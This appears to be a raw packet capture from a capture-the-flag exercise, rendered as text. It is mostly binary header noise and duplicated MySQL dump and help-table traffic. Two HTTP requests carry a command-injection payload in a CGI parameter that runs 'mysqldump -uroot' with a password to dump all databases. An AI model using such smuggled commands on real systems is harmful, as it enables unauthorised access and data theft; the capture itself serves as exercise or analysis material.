`Alter_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', PRIMARY KEY (`Host`,`Db`,`User`), KEY `User` (`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Database privileges'; -- -- Dumping data for table `db` -- /*!40000 ALTER TABLE `db` DISABLE KEYS */; LOCK TABLES `db` WRITE; INSERT INTO `db` VALUES ('%','test','','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('%','test\\_%','','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('localhost.localdomain','Public','root','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('localhost','Contributions','contribute','Y','Y','Y','Y','Y','Y','N','YC2bb0`BiET@/Ԁo0SE< @@y  3PZ{ # a)hNULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Grant_priv` enum('N','Y') NOT NULL default 'N', `References_priv` enum('N','Y') NOT NULL default 'N', `Index_priv` enum('N','Y') NOT NULL default 'N', `Alter_priv` enum('N','Y') NOT NULL default 'N', `Create_tmp_table_priv` enum('N','Y') NOT NULL default 'N', `Lock_tables_priv` enum('N','Y') NOT NULL default 'N', PRIMARY KEY (`Host`,`Db`,`User`), KEY `User` (`User`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Database privileges'; -- -- Dumping data for table `db` -- /*!40000 ALTER TABLE `db` DISABLE KEYS */; LOCK TABLES `db` WRITE; INSERT INTO `db` VALUES ('%','test','','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('%','test\\_%','','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('localhost.localdomain','Public','root','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y'),('localhost','Contributions','contribute','Y','Y','Y','Y','Y','Y','N','YC\4bbBi0`ET@/p܂Ao0E<@?  3PΞ T0  )s, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n FOREIGN KEY [index_name] (index_col_name,...)\n [reference_definition]\n | ALTER [COLUMN] col_name {SET DEFAULT literal | DROP DEFAULT}\n | CHANGE [COLUMN] old_col_name column_definition\n [FIRST|AFTER col_name]\n | MODIFY [COLUMN] column_definition [FIRST | AFTER col_name]\n | DROP [COLUMN] col_name\n | DROP PRIMARY KEY\n | DROP INDEX index_name\n | DROP FOREIGN KEY fk_symbol\n | DISABLE KEYS\n | ENABLE KEYS\n | RENAME [TO] new_tbl_name\n | ORDER BY col_name\n | CONVERT TO CHARACTER SET charset_name [COLLATE collation_name]\n | [DEFAULT] CHARACTER SET charset_name [COLLATE collatioCw4bb0`BiET@/Ԁo0SE<@@  3PΞ T0  )s, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n FOREIGN KEY [index_name] (index_col_name,...)\n [reference_definition]\n | ALTER [COLUMN] col_name {SET DEFAULT literal | DROP DEFAULT}\n | CHANGE [COLUMN] old_col_name column_definition\n [FIRST|AFTER col_name]\n | MODIFY [COLUMN] column_definition [FIRST | AFTER col_name]\n | DROP [COLUMN] col_name\n | DROP PRIMARY KEY\n | DROP INDEX index_name\n | DROP FOREIGN KEY fk_symbol\n | DISABLE KEYS\n | ENABLE KEYS\n | RENAME [TO] new_tbl_name\n | ORDER BY col_name\n | CONVERT TO CHARACTER SET charset_name [COLLATE collation_name]\n | [DEFAULT] CHARACTER SET charset_name [COLLATE collatioCC8bbBi0`ET@/p܂Ao0E<@?  3P֞ *  )n_name]\n | DISCARD TABLESPACE\n | IMPORT TABLESPACE\n | table_options',''),(369,'CHAR BYTE',22,'CHAR BYTE is an alias for CHAR BINARY.\n','',''),(370,'MERGE',7,'\n@menu\n* MERGE table problems:: MERGE Table Problems\n@end menu\n\nThe MERGE storage engine was introduced in MySQL 3.23.25. It\nis also known as the MRG_MyISAM engine.\n\nA MERGE table is a collection of identical MyISAM tables that\ncan be used as one. ``Identical\'\' means that all tables have\nidentical column and index information. You can\'t merge tables in which the\ncolumns are listed in a different order, don\'t have exactly the same columns, or\nhave the indexes in different order. However, any or all of the tables can be\ncompressed with myisampack.\nSee also : [myisampack, , myisampack].\nDifferences in table options such as AVG_ROW_LENGTH, MAX_ROWS,\nor PACK_KEYS do not matter.\n','mysql> CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n ->CX8ZZBi0`EL@/܂Sŀo0E4@? 3 P{) ) C^8""Bi0`E@/Sŀo0Ed@?.S 3 P ) GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive Cv8bb0`BiET@/Ԁo0SE<@@  3P֞ *  )n_name]\n | DISCARD TABLESPACE\n | IMPORT TABLESPACE\n | table_options',''),(369,'CHAR BYTE',22,'CHAR BYTE is an alias for CHAR BINARY.\n','',''),(370,'MERGE',7,'\n@menu\n* MERGE table problems:: MERGE Table Problems\n@end menu\n\nThe MERGE storage engine was introduced in MySQL 3.23.25. It\nis also known as the MRG_MyISAM engine.\n\nA MERGE table is a collection of identical MyISAM tables that\ncan be used as one. ``Identical\'\' means that all tables have\nidentical column and index information. You can\'t merge tables in which the\ncolumns are listed in a different order, don\'t have exactly the same columns, or\nhave the indexes in different order. However, any or all of the tables can be\ncompressed with myisampack.\nSee also : [myisampack, , myisampack].\nDifferences in table options such as AVG_ROW_LENGTH, MAX_ROWS,\nor PACK_KEYS do not matter.\n','mysql> CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20));\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n ->C8ZZ0`BiEL@/go0AE4@@ 3 P{) ) C8""0`BiE@/go0AEd@@-S 3 P ) GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C8ZZBi0`EL@/Ao0E4@?  ֞Pg%&΀"lo em\C8ZZ0`BiEL@/o0˃2E4@@  ֞Pg%&΀"lo em\C<bbBi0`ET@/p܂Ao0Ex  )O\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'teC<bb0`BiET@/Ԁo0SEx  )O\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'teC AbbBi0`ET@/p܂Ao0E \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (indeCAZZBi0`EL@/܂Sŀo0E4@? 3 P)v ) C-Abb0`BiET@/Ԁo0SE \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columns, or rename columns or the table itself. You can\nalso change the comment for the table and type of the table.\n','ALTER [IGNORE] TABLE tbl_name\n alter_specification [, alter_specification] ...\n\nalter_specification:\n ADD [COLUMN] column_definition [FIRST | AFTER col_name ]\n | ADD [COLUMN] (column_definition,...)\n | ADD INDEX [index_name] [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n PRIMARY KEY [index_type] (index_col_name,...)\n | ADD [CONSTRAINT [symbol]]\n UNIQUE [index_name] [index_type] (index_col_name,...)\n | ADD [FULLTEXT|SPATIAL] [index_name] (indeC>AZZ0`BiEL@/go0AE4@@ 3 P)v ) CAZZBi0`EL@/Ao0E4@?  ֞Pg%0ހ"le em_CAZZ0`BiEL@/o0˃2E4@@  ֞Pg%0ހ"le em_C1bbBi0`ET@/p܂Ao0E<*@?  3Pb a5  )spond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, anC;ZZBi0`EL@/Ao0E4B@?F  *P&% SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, anCfZZ0`BiEL@/Eo0lE4B@@F  *P&%"l{ )`xCZZ0`BiEL@/6o0o+PE4@@j  P1ٷN&Y- aw`uCZZ0`BiEL@/o0  E4@@Q 3 PZiN>"l{ )`xCBi0`E@/[Sŀo0E@?ky  P1ٷN&= aw`uGET /~acquire/cgi-bin/get.php?ip=2741 HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.20.1.3 Connection: Keep-Alive C0`BiE@/o0o+PE@@jy  P1ٷN&= aw`uGET /~acquire/cgi-bin/get.php?ip=2741 HTTP/1.0 User-Agent: Wget/1.10.2 Accept: */* Host: 10.20.1.3 Connection: Keep-Alive CbbBi0`ET@/p܂Ao0E<*@?  3Pb   )d REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows use of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This staCZZBi0`EL@/ 6o+Po0E4;@?3  PN&18i( `uawC$ZZBi0`EL@/܂Sŀo0E4@? 3 P)l ) C*ZZBi0`EL@/Ao0E4@?  ֞Pg%:"l[ fmaCBbb0`BiET@/Ԁo0SE<*@@  3Pb   )d REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows use of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This staCUZZ0`BiEL@/܀o0SE4;@@3  PN&18i( `uawCfZZ0`BiEL@/go0AE4@@ 3 P)l ) CzZZ0`BiEL@/o0˃2E4@@  ֞Pg%:"l[ fmaCw bbBi0`ET@/p܂Ao0E<*@?  3Pb Q  )tement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECT statement.\nFor columns used elsewhere in the SELECT statement you must have\nthe SELECT privilege. If the OR REPLACE clause is present,\nyou must also have the DELETE privilege for the view.\n\nA view belongs to a database. By default, a new view is created in the\ncurrent database. To create the view explicitly in a given database,\nspecify the name as db_name.view_name when you create it.\n\nmysql> CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number C bb0`BiET@/Ԁo0SE<*@@  3Pb Q  )tement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECT statement.\nFor columns used elsewhere in the SELECT statement you must have\nthe SELECT privilege. If the OR REPLACE clause is present,\nyou must also have the DELETE privilege for the view.\n\nA view belongs to a database. By default, a new view is created in the\ncurrent database. To create the view explicitly in a given database,\nspecify the name as db_name.view_name when you create it.\n\nmysql> CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column names. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number CbbBi0`ET@/p܂Ao0E<*@?  3Pb   )of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted with respect to the default database. A view can refer to\ntables or views in other databases by qualifying the table or view name with\nthe proper database name.\n\nA view can be created from many kinds of SELECT statements. It can\nrefer to base tables or other views. It can use joins, UNION, and\nsubqueries. The SELECT need not even refer to any tables. The\nfollowing example defines a view that selects two columns from another\ntable, as well as an expression calculated from those columns:\n\nmysql> CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subqCZZBi0`EL@/Ao0E4@?  ֞Pg%D"lQ fmdCbb0`BiET@/Ԁo0SE<*@@  3Pb   )of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted with respect to the default database. A view can refer to\ntables or views in other databases by qualifying the table or view name with\nthe proper database name.\n\nA view can be created from many kinds of SELECT statements. It can\nrefer to base tables or other views. It can use joins, UNION, and\nsubqueries. The SELECT need not even refer to any tables. The\nfollowing example defines a view that selects two columns from another\ntable, as well as an expression calculated from those columns:\n\nmysql> CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50 | 150 |\n+------+-------+-------+\n\nA view definition is subject to the following restrictions:\n\n\n --- The SELECT statement cannot contain a subqC ZZ0`BiEL@/o0˃2E4@@  ֞Pg%D"lQ fmdCLZZBi0`EL@/܂Sŀo0E4@? 3 P)bn ) CeZZ0`BiEL@/go0AE4@@ 3 P)bn ) CbbBi0`ET@/p܂Ao0E<*@?  3P Ÿb 6  )uery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, after\na view has been created, it is possible to drop a table or view that the\ndefinition refers to. To check a view definition for problems of this kind,\nuse the CHECK TABLE statement.\n\n --- The definition cannot refer to a TEMPORARY table, and you cannot\ncreate a TEMPORARY view.\n\n --- The tables named in the view definition must already exist.\n\n --- You cannot associate a trigger with a view.\n\n\nORDER BY is allowed in a view definition, but it is ignored if you\nselect from a view using a statement that has its own ORDER BY.\n\nFor other options or clauses in the definition, they are added to the\noptions or clauses of the statement that references the view, but the effect\nis undefined. For example, if a view definition includes a LIMIT\nclause, and you select from the view using a statement that has its own\nLIMIT clause, it is undefined which limit applies. This same\nprinciple applies to options sucCbb0`BiET@/Ԁo0SE<*@@  3P Ÿb 6  )uery in the FROM\nclause.\n\n --- The SELECT statement cannot refer to system or user variables.\n\n --- The SELECT statement cannot refer to prepared statement parameters.\n\n --- Within a stored routine, the definition cannot refer to routine\nparameters or local variables.\n\n --- Any table or view referred to in the definition must exist. However, after\na view has been created, it is possible to drop a table or view that the\ndefinition refers to. To check a view definition for problems of this kind,\nuse the CHECK TABLE statement.\n\n --- The definition cannot refer to a TEMPORARY table, and you cannot\ncreate a TEMPORARY view.\n\n --- The tables named in the view definition must already exist.\n\n --- You cannot associate a trigger with a view.\n\n\nORDER BY is allowed in a view definition, but it is ignored if you\nselect from a view using a statement that has its own ORDER BY.\n\nFor other options or clauses in the definition, they are added to the\noptions or clauses of the statement that references the view, but the effect\nis undefined. For example, if a view definition includes a LIMIT\nclause, and you select from the view using a statement that has its own\nLIMIT clause, it is undefined which limit applies. This same\nprinciple applies to options sucC`bbBi0`ET@/p܂Ao0E<*@?  3Pʟb   )h as ALL, DISTINCT, or\nSQL_SMALL_RESULT that follow the SELECT keyword, and to\nclauses such as INTO, FOR UPDATE, LOCK IN SHARE MODE,\nand PROCEDURE.\n\nIf you create a view and then change the query processing environment by\nchanging system variables, that may affect the results you get from the\nview:\n\nmysql> CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nCbb0`BiET@/Ԁo0SE<*@@  3Pʟb   )h as ALL, DISTINCT, or\nSQL_SMALL_RESULT that follow the SELECT keyword, and to\nclauses such as INTO, FOR UPDATE, LOCK IN SHARE MODE,\nand PROCEDURE.\n\nIf you create a view and then change the query processing environment by\nchanging system variables, that may affect the results you get from the\nview:\n\nmysql> CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHM clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nC bbBi0`ET@/p܂Ao0E<*@?  3Pҟb   )ALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nMERGE over TEMPTABLE if possible, because MERGE is\nusually more efficient and because a view cannot be updatable if a temporary\ntable is used.\n\nA reason to choose TEMPTABLE explicitly is that locks can be released\non underlying tables after the temporary table has been created and before\nit is used to finish processing the statement. This might result in quicker\nlock release than the MERGE algorithm so that other clients that use\nthe view are not blocked as long.\n\nA view algorithm can be UNDEFINED three ways:\n\n\n --- No ALGORITHM clause is present in the CREATE VIEW statement.\n\n --- The CREATE VIEW statement has an explicit ALGORITHM = UNDEFINED\nclause.\n\n --- ALGORITHM = MERGE is specified for a view that can be processed only\nwith a temporary table. In this case, MySQL generates a warning andC 